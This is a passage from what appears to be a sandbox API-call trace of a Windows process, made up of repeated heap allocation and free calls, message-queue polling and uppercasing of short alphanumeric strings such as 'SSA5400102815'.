returned 0x24ac978 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0160.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0160.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.739] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0160.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0160.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0160.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0160.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.740] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0160.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0160.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.741] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.741] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.741] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.741] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.742] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.742] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.742] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.742] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.742] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.742] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.742] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.748] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.748] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.748] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.749] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.749] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.749] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.749] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.750] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.750] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.750] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.750] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.750] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0160.750] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.751] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.751] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0160.751] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.751] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0160.751] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a3358 | out: hHeap=0x25c0000) returned 1 [0160.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0160.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0160.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.756] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0160.757] HeapFree 